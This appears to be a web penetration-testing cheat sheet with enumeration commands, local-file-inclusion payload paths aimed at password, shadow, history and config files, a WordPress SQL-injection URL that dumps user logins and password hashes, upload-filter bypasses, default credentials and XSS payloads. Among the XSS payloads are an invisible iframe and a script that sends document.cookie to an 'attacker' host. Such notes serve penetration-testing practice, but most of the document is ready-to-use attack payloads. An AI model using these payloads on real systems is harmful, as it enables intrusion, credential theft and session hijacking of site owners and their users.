Web enumeration

Good directory discovery tool:

$ git clone https://github.com/maurosoria/dirsearch.git;  cd dirsearch; python3 dirsearch.py  -u http://$ip/ -e .php

Directory discovery

$ gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip

Nmap HTTP Form Fuzzer


$ nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
Test

Nmap Check the server methods


$ nmap --script http-methods --script-args http-methods.url-path='/test' $ip


Test OPTIONS against every folder/file.

Test every GET/POST parameter against SQLI and RCE.

Find hardcoded credentials

JBoss

JMX Console http://$ip:8080/jmxconcole/
War File

Joomla

configuration.php
diagnostics.php
joomla.inc.php
config.inc.php

Mambo

configuration.php
config.inc.php

Wordpress

setup-config.php
wp-config.php
Authentication
RFI/LFI

Test it:

$ fimap -u "http://$ip/example.php?test="

Automated scanning

$ https://github.com/lightos/Panoptic/

Interesting payloads:

/etc/passwd | /etc/shadow #instant win
/var/www/html/config.php # or similar paths to get SQL etc creds
?page=php://filter/convert.base64-encode/resource=../config.php
../../../../../boot.ini # to find out windows version*
php://input
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
/proc/self/environ
/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/httpd/logs/access.log
/apache/logs/access.log
logs/access.log
/var/log/access_log
/var/log/httpd/access_log
/var/log/httpd-error.log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/www/html/index.php
/var/www/index.php
/var/www/manual/index.html
...
Drupal
$droopescan scan -u $ip
Wordpress

Scan for known bugs:

$ wpscan http://$ip

Try exploit:

/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23
Bruteforcing

Good password list

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_1000.txt
File uploads

Avoid extension checks using tricks like:

.php5.jpeg
.php5%00.jpeg

Different file formats

https://en.wikipedia.org/wiki/List_of_file_signatures
PHP

You can usually bypass file include filters with payloads like:

php://filter/convert.base64-encode/resource=file

If you control an include statenent such as

include("lang/".$_COOKIE['lang']);

You can set a cookie pointing to an arbitrary PHP file and have it executed in your page.

SSL certificates

Find out potential correct vhost to GET

is the clock skewed

Any names that could be usernames for bruteforce/guessing.

Login

Always try user root, admin, administrator with password letmein admin root

Files

Run strings against every file

XSS vectors

Invisible iframe:

<iframe src="http://attacker/" height="0" width="0"></iframe>

Steal cookies

<script> new Image().src="http://attacker/bogus.php?output="+document.cookie; </script>